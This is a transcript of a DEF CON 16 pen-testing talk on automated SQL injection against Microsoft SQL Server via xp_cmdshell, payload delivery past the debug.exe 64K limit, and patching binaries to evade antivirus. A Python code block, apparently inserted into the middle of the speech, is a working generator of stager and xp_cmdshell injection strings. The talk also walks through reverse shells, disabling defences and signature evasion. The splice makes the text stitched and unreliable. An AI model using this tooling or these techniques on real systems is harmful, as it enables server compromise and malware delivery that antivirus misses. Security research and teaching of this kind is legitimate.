What's going on there, DEF CON 16? I need some audience participation. Get some shirts. Hey, this is a couple of shout-outs real quick. We want to obviously thank DEF CON for having us up here. Specifically DT; it's been a long time, but we finally made it up here. Appreciate you guys having us. Great party yesterday. Had a number of interesting events happen. So obviously, Las Vegas: what happens here stays here. Here's what we're going to talk about, guys. We're going to talk about some cool stuff that's coming out and some tools released, talking specifically about what we can do around SQL injection. We're going to talk a little bit about how we're able to bypass AV and do some uploads to some packets and put some tools up on the server and see us compromise some stuff. Great talk before us. We're going to introduce the panel here. I'm Ken Stasiak. We're all from Secure State. Next to me is Dave Kennedy, ReL1K, author of Fast-Track. Fast-Track, anybody use it? In BackTrack. All right, all right. We're going to show it. If you haven't used it before, we're going to show it. Obviously Dave's got a number of years of experience, good at automating the security process and putting some things in place to allow us to efficiently do our job. Next to him is, well, actually I'm going to go in order here, we've got Scott White here. Scott, his expertise is web application security. We're going to see a lot of what he's brought through with his SA Exploiter. And then we have Andrew Weidenhamer. His expertise is obviously network, and staying off the list. If you guys know what the list is, full disclosure there. Andrew wants to stay off that list. So if you're interested in that, come see Andrew. We're going to talk about a case study here. And as I said, Secure State, we're an information security company based in Cleveland, Ohio. What we do is ethical pen testing.
So what you're going to find is we do about 120 different pen tests a year for different clients, ranging from government all the way to commercial. In this specific example, we brought a Fortune 100 organization. And through the course of hacking into the organization, we've developed some tools that we thought would be pretty cool to release. And we're going to actually be demoing those tools and releasing them at the end of this presentation. The case study is going to actually walk through how we used those tools, how we developed them, and then specifically what you can do to use those ethically in your own course of penetration testing. All right, when we do the demonstrations and testing, the first case study is going to walk pretty quickly through the tools. We've seen a number of different presentations, and what we like is when we can do some high-end, fast demonstration of the tools. And then if you're interested at the end, getting more in-depth and more detailed into the tools themselves, we can actually go through that. And then at the end, if you haven't seen Fast-Track, we're actually going to do a wrap-up and show some Fast-Track with BackTrack, embedded in that, obviously. What else we got there? Has anybody seen the talk with Kurt? Great talk, NTLM is Dead. And we had literally hours of fun talking about Squirtle and the way that we were using it. So I want to just give props out to that. Awesome presentation from Kurt. And without further ado, we're going to start the live demonstration. Thank you.

Hey guys, how's it going? So the whole point of this presentation was to go over what we were doing for a Fortune 100 company. SQL injection attacks aren't really a new topic in most cases. But we did some new, interesting twists here that we're going to release at DEF CON that were pretty interesting for us to do.
And what we're going to do is I'm going to walk through each one of the tools that we used, how we did it, how we got around certain challenges. We're going to go through and see that we get picked up by AV. We're going to go ahead and bypass that. It's pretty much trivial, for you guys to know, to bypass any type of AV nowadays. So we're going to walk through all that good stuff. So without further ado, I'll kind of load up the site here that we had. So we got a site here that we found. And what we ended up doing was, the first thing we go after when we do penetration tests is we start looking at web application layers. Because web applications are generally the pretty easy way to bypass the systems. A lot of companies invest in firewalls and all that great stuff. So our main avenue of attack is through the web application layer. And so what we did was we started looking through different web apps and identified some SQL injection. And for those of you, you mean SQL injection, some simple stuff here? You know, hey, it blows up. We got some SQL injection here. We know we're good. We know it's there. So from there, we decided that we were going to see if it's running under DBO or SA. And it was. And from there, we decided to start going and attacking the underlying operating system. How many of you out there have heard of xp_cmdshell? Just a few. I'm disappointed in you guys.

What we're taking a look at here is the SA Exploiter. Started this probably a year ago to help automate SQL injection full compromises through xp_cmdshell. Once we've identified that a web server or the SQL server is executing queries with excessive privileges, what we do is, this tool just automates typing. This thing is a string generator. And what we're going to do is we're going to take this to deliver our payload. What's our payload going to be, Dave? Some nice Metasploit shellcode right here. Anybody ever heard of Metasploit? What's that? muts. So a little copy and paste.
You can do Control-C, Control-V, you're elite. Click that little Format Shellcode button. Make some pretty things over there. Use that Binary Payload checkbox. Generate our injection string. That looks pretty complicated, too. So, Dave, then what do we do? We copy that, right? Some more Control-C, Control-V. What was our Metasploit shellcode that we had there? The Metasploit shellcode was just a reverse TCP shell that we used in Metasploit. And copy and paste it. And what's unique about this is, we'll get more into detail once we start talking about the visual tools, but we successfully figured out a way to bypass the 64K limit through debug. So it's a nice, interesting thing that we'll be showing you guys here in a second, but we'll do that more in depth here. So basically it's a Windows reverse shell. Straight off of Metasploit.com. Copy, paste, click a button. Check a checkbox. Click Generate, copy, paste. Paste, put something in for the password. Say go. Waiting. This part's dead time. So I think I'm going to start taking my clothes off here, right? Wait, wait, were you guys here for the shirt or taking my clothes off? I couldn't tell. Don't do that. Oh, what is that? Yeah! There's the shell. Shell number one. Anybody see that? That was an elite hack. Control-C, Control-V. Hard, huh?

All right, so in this pentest, what we did first was we created a custom reverse TCP shell using assembly. And what we did was, when we injected it into the system that we're trying to attack, it was going to be picked up by AV. And we'll go ahead and demonstrate that real quick. Not to mention, when we deliver our payload, there are no egress connections. We don't use TFTP, FTP, anything like that. And I'll talk about that later. So we can be dropping our Trojan or our keylogger, or whatever it might be, onto the server, and it never connects back to us. I mean, we showed that it could, but the payload delivery method is not required to do that.
OK, so what we did here is we have our custom exe. Basically, we can deliver any custom exe we want, along with Metasploit shellcode. So I leave the options on this tool up to you. Whatever you want to do, it doesn't matter. I mean, Metasploit, I don't know what you want to do, what your goal is. Different pen tests have different things that our clients want. So we leave that in your hands. So this is a custom reverse shell. And AVG is up to date. And as you can see, the signature is right here. It was updated today, 8/10 at 1:49 PM. So we're out of date. It just couldn't connect to the connection manager. So right now, we're going through and trying to deliver our payload. And right now, it's dropping onto the system. And we'll show you detailed steps on how it's doing all that, but just kind of walk through it. And as it's going through, it's waiting for it to execute. It takes a while. And we also have our command shell running here. Netcat. So AV didn't pick it up. G is the right exit. So here we go. Some more hard stuff. You can point, click a button, browse, find your own executable. That's about all you have to know. Again, that ultra-elite copy and paste. All right. So right now, we're delivering it. We've got Netcat listening. And hopefully, AVG picks it up here. And we'll scan it too while we're waiting here, just to show you that it should be picked up. So you can see here, it does detect a malware infection, found one. And for some reason, it's not going to get detected on the other side. But anyways, in most instances, it would get detected by AVG. For some reason, it's not picking it up. We'll go ahead and just manually scan this thing real quick. So during this case, in this pentest, we were getting flagged by antivirus. So if you guys were getting flagged by antivirus, what would you do? Or you could just use a tool that we developed to get around it.
And so what we did was we figured, we took all the antivirus signatures out there, like AVG, Symantec, McAfee, NOD32, Kaspersky. And we created a smart database out of it. And through there, what we do is we look at what antivirus signatures are flagging on a specific binary. It's actually looking at what antivirus is detecting. And then it makes changes to that binary and automatically rewrites it for you to completely bypass it. And it starts off very simple. Just looking at instructions, looking at different characters that it might go on. And if it fails, it keeps going further and further until it does a custom packer or various encryptions. So what we ended up doing from that perspective is, this tool that we're going to be releasing, it goes through and automatically detects that. And I'll go ahead and show you that right now. Generally, when we do our pentests, we don't use automated tools. I mean, we do use automated tools, but a lot of times we find that writing our own is a lot easier. So we go into this Tainted folder here. You can see we got Netcat, we got PWDump, we got our custom reverse shell here. So we're going to look at this reverse shell. We're going to scan it with AVG. That pops up as infected. We do the same thing with PWDump: infection. And then we got Netcat. Thank you, AVG, for flagging a very legitimate tool. Ha, ha. Netcat's taken. So what we're going to do is we're going to take our tool. And really, it's a brute force here. I mean, we're looking at what AVG is flagging and we keep trying different patterns. So what do we got to get around right now? We're going to go ahead and run that. So you select AVG. And what are we going to do? We're going to do the reverse shell. Hit 1. It's looking for instruction signatures. And if you look at what it's going to find, and you see the instructions found, it found that AVG is specifically flagging on the offset 00400158. So it's automatically going to recommend to you to change it to get past it.
So do you want us to redo the actual binary of AVG? So we're going to go ahead and run that. So do you want us to redo the actual binary itself? Sure. Yes. Copy. Again, another one of those extremely hard things to do. Can you type numbers? All right, so scan with AVG. See here, no viruses came back. How about that? Like I said, we're all about automating. At the end, you're going to see the big one. So now that we've successfully bypassed it, we go ahead and deliver our payload like you saw before. We're getting a reverse command shell out of the system. Now what we're going to do is, since we are talking about malicious code being on the system, what we had to do, and to the client, was go on there and say, well, hey, how do I go on here and look at what's going on? So we're going to go ahead and execute our command shell again through the automator. And we'll walk through all the functions. But I mean, you can do things like turn on xp_cmdshell, if it's disabled. Yeah, we'll take a more in-depth look at this later. So the client really wanted to know, if we were breached, walk us through what you do to find it. They just didn't understand. And they had no idea where to start. So we helped them out with this. And while Dave's getting us set up here, they really wanted to understand, to really push it to the upper-level execs, what can be done, what we're able to do, and also educate them at the same time. Very important during a pen test is the knowledge transfer. So our clients understand what we're doing, what the importance of it is. And if they can do Control-C, Control-V, they can do the same thing. So we're just going to wait for the established connection to hit again. And then on this side, we're going to go ahead and get our tools ready. Now we've created a new tool called DLL Spy that looks at what DLLs are being used. It's actually pretty simple. But what we're going to do is just look at a very high level of what we'd be doing.
So now we've got a command shell. Again, we have an established connection. So what's the first thing someone's going to do? And that's that. So you can see we've got a TCP connection established to this person on 4444. All right, great. Let's take a peek at what's going on in TCPView. All right, it looks good. Standard. This is kind of interesting. System process zero. So what we're going to do is open Process Explorer and try to look at that process. It's not showing up. It's weird. If you look here, how many command shells do I have open here? I have one. It's showing two open. Kind of strange. So that looks legit. Let's just go into cmd.exe. That's kind of weird. It's hooking into moot.exe. So there we go. We got something weird. So we can do DLL Spy. Browse that directory. You ever heard of a legit Windows program called Moot? So we see it's using a bunch of different types of DLLs. And in those, we have a lot of network sockets. We got a bunch of different things that it's connecting to. So we know for sure this is probably our malicious code. So being able to detect it, good. Great stuff.

All right. Let's go into the actual features of this tool. And Fast-Track itself, when we go into Fast-Track itself, it really is an automated way of breaking in through SQL injection. What you guys will see is we can automatically scan subnets, crawl websites, look for SQL injection, automatically attack it, try fuzzing the actual bypass, and do string completion on SQL injection, and automatically give you some really cool stuff, including some reverse GUIs that we'll demo. But we're going to get into Scott's tool here. We're going to go through each one of these, kind of walk you through what you're doing.

All right. So we're going to take a look at the SA Exploiter here. First of all, there were a lot of goals within this tool. We'll talk about those. But the current state of SQL injection tools, I really don't like it. Got all these tools out there. Everybody says they work.
Most of them don't. Everything automates it for you. Well, there's more to it than point and click. This tool is made specifically for exploiting Microsoft SQL Servers running under SA, or those privileges, DBO, as some of you may know. It kind of made me mad with all these tools. I don't like all these things that, you know, we're going to automate SQL injection. We're going to do that. It does everything for you. Well, a lot of the things, I mean, my tool collection is rather small for SQL. I choose to do it manually because I find that's a lot better, and this tool is geared towards that. I would like to mention SQL Ninja. It is probably one of the best ones out there. Unfortunately for beginners or script kiddies, whatever you might call yourself, it's only for Linux. It's command line. It has features like file transfer, and it uses Netcat to do that. What's wrong with that? What if we have egress filtering? That's going to be a problem. I still want to get my stuff up there. If I find something that's going to stop me, I'm going to get around it. So hackers are persistent. And plus, you know, Netcat also gets flagged by 90% of the antiviruses out there as well. So when you drop a Netcat on there, good stuff. So like I said, most tools try to automate things. I still believe manual is the way to go. You have more control over what you're doing, not as noisy, things like that. After doing a whole lot of typing, like I said, this is why the tool came out. The tool that you're looking at is a string generator. That's all it is. We just generate the injection string. That's the main function of this tool. Why is it nice? We don't have to remember all the SQL syntax. There's obviously a lot in there. And not everybody's an expert in every area. My original plans were to do everything in SQL Server, in memory. Microsoft has some nice limitations. For example, you can have up to an 8,000-character string literal, and that's it. So why is that an issue?
You can obviously see that we have a whole bunch of other things on here. So I ran into some roadblocks, went back to square one, and changed the plans. There's a lot of issues with double- and triple-nested single and double quotes, things like that. Again, why we want to be all manual. Due to the requirements when I was writing this tool, we are ethical pen testers. Our requirements are a lot more stringent than your malicious hackers'. With our databases and our attacks, generally our clients, if we're doing this in a production world, they want to keep the integrity of their database. So what's that mean? That means as a pen tester, I cannot update, delete, modify any kind of data. You have to create stored procedures or tables or things like that for a lot of the known ways that are out there. So I said, well, we're not going to do that. So a couple of the requirements. Absolutely must not require an egress connection using FTP or TFTP. Why? Well, that's a known way that people do it, and we want to be better than that. It must be easy to use. We already showed you. If you can do Control-C, copy-paste, you can do it. Within Windows Debug, we already talked about that, you can convert hexadecimal stuff to binary. Like Dave said, we have a 64K limit with that. How many people knew that? Not very many. Who likes limits? Not me. 64K, no longer. We're going to show you how to get around that today. So our file transfer: so long, Windows Debug. And generally when you're attacking systems, generally when someone compromises a system, they throw a stager on there, which does a GET to more files or does some sort of file transfer, like SQL Ninja does for file transfers back and forth via Netcat. With this new attack, we don't have to do any type of things like that. It's not using any type of egress connections or file transfers. We do it all through SQL. So it's pretty slick. Like I said before, everything... I like to leave the options in your hands.
I don't like these tools that go out there and do something and I have no idea what it's doing. So all the options on here are for your convenience. Things like Metasploit. We have all that shellcode out there, or the shellcode generator. I don't care what you do. I leave the option up to you. We have Metasploit out there, so let's utilize it. So I did. What we're going to talk about next is how we actually transfer our payload over. This is a new technique that, to my knowledge, nobody else has done. This helps us bypass that 64K limit. Pretty much what we do is we're going to use Windows Debug to transfer over a small executable. It was about 5K. And we're going to use Windows Debug to put that over there. Pretty much you echo the hexadecimal representation of my custom file that I wrote, and we're going to get that over there, and we're going to have a custom binary over on the system that's 5K. What does that do? It's a hex-to-binary converter. What does that mean? What we can do now is echo as much hexadecimal stuff as we want into a text file and tell it to go at it, and it'll convert all that to binary. But there's no limitations. We don't have that 64K limitation. So, first thing we're going to do is echo text into that text file, use Windows Debug to get our custom converter over there. We're going to echo the custom, or excuse me, our hex values for our payload, whatever it is, whether it's your custom Trojan or your Metasploit code. Pretty much we just put Metasploit code in an EXE stub and a wrapper. And whatever it is, we're going to echo that hex over into the text file. We use our custom converter to convert it, and then we can execute it, do whatever we want. So, let's show this. We're going to use Metasploit shellcode. Again, copy, paste, Format Shellcode. Just preps it for me. Any custom binary, Meterpreter, VNC inject, Metasploit VNC inject, Meterpreter, console, anything you want at this point. Again, there's no limit.
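The two-stage transfer described above, written out as an added example. This is not the SA Exploiter's code and not Secure State's; it is a stand-alone string generator of the same kind, showing (1) the classic debug.exe script that rebuilds a small file (and why it stops at 64K), (2) echoing a larger payload as hex text for a converter stub to rebuild, and (3) wrapping every command in xp_cmdshell and packing the result into GET-sized injection strings. The working directory, the stub's name and its command line (hexfile outfile), the parameter name id, and the 2048-byte request limit are all assumptions of this example; the stub and payload bytes are constructed stand-ins, not real binaries.

```python
import urllib.parse

DEBUG_LINE_BYTES = 20          # bytes per "e" line in a debug.exe script
ECHO_LINE_BYTES = 64           # payload bytes (128 hex chars) per echoed text line
DEBUG_MAX = 0x10000 - 0x100    # debug.exe assembles at 0100h of a single 64K segment


def debug_script(data, name):
    """Classic debug.exe script that recreates `data` on disk as `name`.
    debug.exe is 16-bit: "w" writes CX bytes starting at offset 0100h of one
    segment, which is the 64K ceiling the talk refers to."""
    if len(data) >= DEBUG_MAX:
        raise ValueError("too big for debug.exe; ship it as hex text instead")
    lines = ["n " + name]
    for off in range(0, len(data), DEBUG_LINE_BYTES):
        chunk = data[off:off + DEBUG_LINE_BYTES]
        lines.append("e %04x " % (0x100 + off) + " ".join("%02x" % b for b in chunk))
    lines += ["rcx", "%x" % len(data), "w", "q"]
    return lines


def echo_lines(lines, path):
    """cmd.exe commands that write `lines` to `path`; the first one truncates."""
    return ["echo %s%s%s" % (line, ">" if i == 0 else ">>", path)
            for i, line in enumerate(lines)]


def build_commands(stub, payload, workdir="C:\\WINDOWS\\Temp",
                   stub_name="stub.exe", payload_name="payload.exe"):
    """Two-stage transfer: debug.exe rebuilds the small hex-to-binary stub,
    then the large payload is echoed as hex text and the stub converts it.
    No outbound connection from the target is needed at any point."""
    cmds = echo_lines(debug_script(stub, stub_name), workdir + "\\s.txt")
    cmds.append("cd /d %s&&debug<s.txt" % workdir)
    hexstr = payload.hex()
    step = 2 * ECHO_LINE_BYTES
    rows = [hexstr[i:i + step] for i in range(0, len(hexstr), step)]
    cmds += echo_lines(rows, workdir + "\\p.txt")
    # The stub's command line (<hexfile> <outfile>) is an assumption of this example.
    cmds.append("cd /d %s&&%s p.txt %s" % (workdir, stub_name, payload_name))
    cmds.append("cd /d %s&&%s" % (workdir, payload_name))
    return cmds


def xp_cmdshell(cmd):
    """Wrap one OS command in an xp_cmdshell call usable inside an injected query."""
    return "EXEC master..xp_cmdshell '" + cmd.replace("'", "''") + "'"


def pack_requests(commands, param="id", base="1", max_len=2048):
    """Split the commands into GET-sized injection strings. Each request closes
    the original literal, stacks as many xp_cmdshell calls as fit under
    max_len once URL-encoded, and comments out the remainder of the query."""
    def render(batch):
        inj = base + "';" + ";".join(xp_cmdshell(c) for c in batch) + "--"
        return param + "=" + urllib.parse.quote(inj, safe="")

    requests, batch = [], []
    for cmd in commands:
        if batch and len(render(batch + [cmd])) > max_len:
            requests.append(render(batch))
            batch = []
        if len(render([cmd])) > max_len:
            raise ValueError("command does not fit in one request: %r" % cmd)
        batch.append(cmd)
    if batch:
        requests.append(render(batch))
    return requests


def demo():
    # Constructed stand-ins, not real binaries: a 512-byte "converter stub"
    # and a 100 KB "payload" that is well past what debug.exe alone can write.
    stub = bytes(range(256)) * 2
    payload = bytes(range(256)) * 400
    cmds = build_commands(stub, payload)
    return cmds, pack_requests(cmds)


if __name__ == "__main__":
    commands, reqs = demo()
    print("%d commands in %d GET requests" % (len(commands), len(reqs)))
    print(urllib.parse.unquote(reqs[0])[:160])
```

The order matters: the requests have to be sent sequentially, since each echo appends to the same file and the converter only runs once the last hex row is in place. With a POST parameter the same command list can be sent as one long request, which is the case the demo above shows.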
If you want to upload two gigs, it might take an hour for it to compile it back to an executable, but at this point, there's no limit. Yeah, and these colors are a little off for some reason. They don't look like this normally. So, we want to use the checkbox here, Use Binary Payload, because we did that over here. And we're going to say Generate. And we can see that there's a lot of stuff going on here. Basically, all we're doing is piggybacking commands onto the SQL server. A whole bunch of them in a row. We really don't care how long it takes, because it's all going to be queued up. And what Scott's demonstrating now is the POST method. Obviously, if you're using GET, you're going to have to split this up a bit. When we show Fast-Track, it does automated attacks using POST and GET, and splits it up into chunks so that, you know, you can get around any POST or GET restrictions. Sorry, not a Mac user. Who lost? So, we have a reverse shell code here, and we need to get Netcat listening. Okay, so now we have Netcat listening. Say go. If you look over here on our server, I mean, it's going to spike up quite a bit. Now we're using 100% CPU, and that's when it's doing the debug conversion, as well as when it's taking all of that hexadecimal code and converting it back into binary. And there's the shell for us. So copy and paste Metasploit shellcode, SQL injection, it's up to you. To my knowledge, no other tool can do this. SQL Ninja can do Meterpreter and VNC, DLL injection. But to my knowledge, nobody else can do this. So that's how you do it with Metasploit shellcode. Now we're going to show you how to do it with a custom EXE. Okay, this is our custom reverse shell that we wrote. Use Binary Payload, Generate. Just need to add a port and an IP address. And we say go. And our server is converting it. Sometimes, depending upon the size of your payload, it can take up to five or ten minutes. I mean, if you put a huge file up there, that's going to be a lot of I/O
for the system to do. So whether we use Metasploit shellcode or your own custom EXE, this shows you pretty much what the capabilities are. There's other options within the tool. These ones are pretty much well known. We have options to turn on xp_cmdshell, if you believe it's turned off. We can add a local user account. Pretty much automate a lot of things we might want to do. Disable firewalls, antivirus. We can connect back via FTP. Pretty much automates SQL injection running under SA. The main features that we wanted to show you, though, were the Metasploit shellcode and the binary payload transfer. There's other options to it as well. The blind fuzz list generator: if we have things being displayed back to the screen, we're not really sure what the different types of data are that are being presented back. Basically, it's just going to generate a fuzz list with different types, and you can put that through, like, WebScarab, through the fuzzer in there, and go through and see when you get the correct data back. Pretty much we're just automating it. There is an auto-exploit option if you have it in the GET request. Depending upon the web server, the GET requests are going to have limitations for how long they're going to be, so that's going to be... You're going to have to split up your injection, which could be very long, as we can see here. And Dave and Andrew will talk about that later. All right, so that's the SA Exploiter. Towards the end of the presentation, we'll let you know where you can get that, and it'll be available to download to use ethically in your own pen test.

All right, who wants to see some really crazy stuff right now? I'm going to wake you guys up. Come on. All right, so for you guys that don't know Fast-Track, really what it was was I decided to learn Python a while back, and I was more of a C# guy.
And thanks to muts, I wish I didn't learn Python, because my wife hates me, and I'm up coding it late nights of the hour, so special thanks to him for that. But what Fast-Track is, I really try to automate a lot of different types of attacks out there and some unique ones. I originally came up with the attack for mass client attack using Metasploit, and egypt from Metasploit has now created the autopwn feature for that. So there's a lot of different types of attacks out there that you can do with Fast-Track. Specifically the one that we're going to do here, what you just saw in Scott's tool, we took that one step further and really automated pretty crazy stuff. So what we're going to do, and what you're going to see, we're going to scan a subnet for web servers, looking for web servers out there. So I'm going to identify them, crawl them, look through the whole website, every form parameter, trying to see if it can get a correct SQL syntax. We can do both error- and blind-based SQL injection, automatically inject, and get us some reverse shells and some reverse GUIs. Here's the syntax. I also built a front-end web server for it so that, for you guys that just want to point and click, we can also do that, and I'll show that a little bit later. But as we're seeing here, we're running Fast-Track, we're running the SQL component on it. We're using an error-based SQL injection; we'll demo error-based in a few. That's the IP address we're attacking, and we're using a Metasploit VNC inject using the shikata_ga_nai encoding. Does anybody know what that stands for? In Japanese? There is no hope. There is much to see. And we do a little bit more different things here. So once we're crawling the site and once we identify form parameters, we automatically start attacking them. Under SQL SA, we automatically try to elevate our privileges. We turn on xp_cmdshell if it's disabled. We turn off DEP. A bunch of various other things that we try to do.
Andrew, do you want to explain what it's doing here? So basically right now, as you guys can see, it's crawling the website that he entered. Right now, we're actually looking for the href tags inside the HTML. Some of you are probably wondering, what happens if you have URLs that are in JavaScript? Right now, we don't have that functionality added. Before we release the final version, we will add that. Keep in mind that this tool is in beta version. So when we release it with Fast-Track, we're expecting a lot of feedback. We're expecting bugs. So we need that feedback, because before we release the final version, we want to make sure that we get everything worked out. So right now it's crawling the entire website, looking for every single URL that's branched off the website. Originally, we were going to do nsa.gov, but we thought we'd get in a lot of trouble for that, so we decided not to do it, as far as a fake website. But right now, we're just doing a fake website that we created. And keep in mind that if you're scanning a website such as WebShots or something like that, some huge-ass website, we actually allow you to put a depth parameter in our spider. So if you don't want it to take two or three days to spider your entire website, you can add a depth parameter of two. Obviously, you won't get the entire website. But if that's what you're looking for and you don't want to take a long time, we give you that option. Just finishing up here, we decided to do a very long site for some reason that would allow a lot of dead time in the middle of a presentation. So... Who wants a t-shirt? There we go. You only get one. There's only one per person here. Hey, nice hand. Nice hand. So, it's still crawling again. It could take some time, depending on how large the website is. Again, you're going to want to manipulate the depth parameter a little bit to speed things up. And at this point, we don't really have to do anything. I mean, you just let it run.
Then it's going to do everything, attack it, try to finish the strings for you, and do everything else to that effect. Scott said he likes to do the manual attacks. I really don't. I'm lazy. As much as I can automate shit, that's what I'm going to do. Dave and I both created this tool. Basically, you put in the URL, you let it go, it finds SQL injection. You want to exploit? Yes. You got a shell. So, as you can see here, we found SQL injection and tests pass. After this, it flies by the seat of its pants. It's automatically elevating our privileges to SA, if not already. It's turning off DEP. It's enabling xp_cmdshell. And then here, we're using a GET request. It's all dynamic. So, regardless of what payload you put in there, if it's 10 megs, it's automatically going to split it up into chunks so that it does get out to the server using GET requests. So, as you can see here, we're taking our 64K debug bypass, the hex-to-binary payload that we initially used in Scott's talk. And we're going through and chunking it up into four different chunks. There's a custom text file that right now has the different SQL injection parameters. So, you know, like a single quote, but that's totally customizable. Whatever you guys feel that, you know, identifies SQL injection, you can add it to that file. So, right now, what's happened, basically, is it found the URL that has SQL injection on it. It's delivering our Windows debug bypass payload. Once it gets on the server, it's going to compile it, and then we can actually pretty much deliver any payload that you guys want. Right now, we actually have three custom ones inside this module. We have the VNC inject, Metasploit Meterpreter, and then our customized reverse shell. But, again, it's totally customizable. You can put any payload in there you want. It may take some time, but it launches the xterm window right now. And what we're doing is we're injecting the Meterpreter inject right now.
So, if you guys are really into Metasploit, pretty nice way to use it. Do pretty much whatever you want to at this point. So, because here we got it. So, okay, this is a completely automated tool. Dave and I developed this tool with the mindset we wanted it to be as automated as possible, as scripted as possible. A CISO can run this tool if he wants to. Whatever it is. Basically, again, you type in a URL or a subnet. If we use a subnet option, basically you have the option to put in a class C or whatever it is. And then what we'll do is actually go through the entire class C looking for web servers. After it finds the web servers, it will present the user with the list. The user then has one of two options. It can scan the... it can actually scan the entire list that it found. So, if you put a class B in there and it finds 500 web servers, then obviously you can go through each single one and it will scan them, look for SQL injection, find it, allow you to exploit it. So, those are basically two options. Scan a subnet or a single URL. Right here we're going to do the actual GUI itself. So, we'll get a nice little graphical user interface in the back end. The reason why we wanted to release the Windows GUI is because we know everybody at DEF CON uses Windows. So, we wanted to release a nice tool for that. I'm so getting beat up at this. I wonder how many people I have just offended. So, really what we did, we didn't reinvent the wheel. We know we're using a known exploit, but what we did do is something that we think is pretty cool. Something that we haven't seen yet. I mean, again, completely automated, no manual techniques, and honestly, it will find SQL injection. Hey, guys, let's give it up. Did you see that? What do we have here, Dave? Nice command shell. You see, I'm not switching over anything. This is a window right here for the actual 1N. This is the actual VNC, as you can see up here. Full remote desktop, automated. Does it get any easier than that?
For those of you that listen to, or know, lolcats, I've been having a little lolcats moment there, so I has been poeing on those. And I think what we forgot to mention, too, when it finds SQL injection, the way it's doing it is obviously it's injecting the form parameters and submitting. If it comes back with the SQL error message, you know, like a SQL ODBC message or something like that, we're using regular expressions on that page to find SQL injection.

So, for those of you that want to use a web interface like Metasploit, you got SQL opponents right here. You got blind-based, error-based, whatever you want to do. We won't go through the blind-based because that's going to really put some dead time in. What we're thinking about doing is adding time-based data so that we can actually validate that the blind SQL injection is working properly. At that point, it would initiate the attacks. So that should hopefully be put into the next release there. But as of right now, it just kind of really brute forces blind SQL at that point, trying to look for anything, a shot in the dark. And before we release the final version, right now it currently can't do HTTPS or SSL, obviously. So we'll add that in before the final version, and we're actually going to add in a login functionality. So if the page has a login and you want to continue spidering after you're an authenticated user, we'll add that in as well.

So all I did was I entered all my stuff and it's spidered it. It found a single website. It's going to go ahead and automatically crawl it and go through all the various things like that. Once we've finished the crawling, it's going to go through and do everything that we did. And as you can see, that is through the web interface. So it has a bunch of different options you can use: an interactive mode where it's kind of like menu driven, the command line mode, and obviously the web viewing mode.
So we showed those two real quick and what's going on with FastTrack. I'll show you guys now the AV and what we're doing. We'll go pretty simple at this point. We lost our reverse engineer, John Melvin, if you saw that he was supposed to be on this topic. He's unfortunately getting married so he didn't make it to DEF CON. I'll try to keep a spot here.

So a lot of antivirus signatures out there are really pretty basic in all forms. They look for specific things in files to flag on. And those are what you see in the signatures. We did a review on NOD32 where we completely destroyed it and went through it. There's really nothing out there at this point that's really getting past it. It's pretty trivial at this point to bypass it. So what we wanted to do was create a tool that automated it for us, so that when we're doing a pen test and we get nailed by AV, we write a custom payload, it automatically goes through it. So I'll show you what it's doing and how we're doing it.

So if you look at our folder here, we got a folder here called Tainted. And those are the ones that it's getting flagged on. So you got the reverse shell, PWDump and Netcat. We won't do PWDump since it's not getting flagged. But like PWDump, for example, AVG was looking for certain characters like "passwords". So all you need to really do for that to bypass is change all the S's with dollar signs. Wow. It shows you how really basic these are. I'll send it to OllyDbg real quick. We'll load our Tainted reverse shell like it's blasted. And this error right here means that it's already packed. And in most cases, you know, this is the type of error you're going to get when there's a packed binary. So from here, the first signal that it's doing it, and especially in a packer, is it's jumping to a specific address. So we're going to go to that address that it's jumping to. And we see these two flags here. Now our tool, what it looks for, is what specifically is AV flagging on? Why is it stopping it?
It's specifically stopping on these two functions right here. It's flagging on these two. So all we need to really do is change these around to be something different than AVG or Symantec or McAfee is going to find. And before we came here, we ran it through VirusTotal, and after these changes to it, it got through McAfee, Symantec, AVG and Kaspersky. So those are pretty good ones out there to get around, right? So all we're going to do here is we're going to change this to mov EBX instead of ESI, and then change this to be mov ESI to EBX. Switching them around. All we're going to do, we're going to save this file. So here's our reverse shell that we just saved, the new one, right? So we got reverse shell.exe, and we'll go to the DEF CON folder real quick just to run a scan against it, just to make sure that was in fact what I was using. Malware detected. We go to our new one that we just wrote on the C drive. Malware not detected. Now there's a bunch of different things you can do. This is really basic, but our tool automatically, gradually gets more and more complex as it goes along.

Thank you. Actually, one got me in the side of the head there. That was a must, wasn't it? Dave, what's the lemon party? All right. Back on to our topic, Gary. It's a game of bingo gone horribly wrong.

So we took a look at reverse shell.exe. Now we're going to look at what does netcat get flagged at? And like I said, it's really trivial to bypass these things at this point. So what our tool is going to do at this point: the first one it found was instructions. You know, it jumped to a specific address and all we had to do was change those two values around. What happens if you have to do something different? So we're looking at our Tainted folder here. We're going to look at netcat. I'll just demo that the tool is actually working too. I forgot to mention that. So reverse shell.exe, we'll do rewrite something. A lot of times it doesn't work.
So we'll just do 10.21.25.2 4444. So on the netcat side of things, you see here it didn't find any instructions that it could change that AV was flagging on. But it was looking at immediate constants used by AV that's getting detected. So you look here, it's jumping to this specific address here, 0401178. Well, there's also other instructions inside netcat that do that same jump. So what our tool automatically detected was: why don't we just rewrite this specific one that it's flagging on and move to another jump that is jumping to the same address? What is that going to do? Let's find out. And just so we know, we'll go to the DEF CON folder like we did before. Go to our Tainted.

Man, my head really hurts now. That was a good one. Someone was really angry at me. At least it smells good. Yeah, it smells like lemon now instead of a bunch of guys. That's kind of nice.

Okay, so we see here that the spyware was found. So what we're going to do is open up OllyDbg again. Go to netcat and we're going to go to that address that's specified there. So we'll go through this one more time so I can see what actual address it is there. I totally forgot. The lemons, I swear. So it flagged on 0401178. All right, so right here you can see 0,0. All right, so here we see mov ecx, and if you look at where it flagged on netcat, it says that it flagged on the jump short right here at offset 1137. So we go to 1137. You see here it's jumping right here. So we need to find another one that's going to 1178 that we can just change around. So if you look here, we got another address right there that looks nice and tasty for us to use. So we're going to change that to 114C. Do the same thing we did last time. So we got a netcat that you see right here. No more AV. And again, these are all really basic attacks that you can do. I mean there's, you know, polymorphism or encryption and packers and all this crazy stuff out there you can do, and it will eventually do that if it does get flagged.
But at this point, to be honest with you, there isn't too much out there that's not going to get flagged on in the simple steps, because they pretty much suck. Sorry, if there's anybody out there from those companies, I apologize.

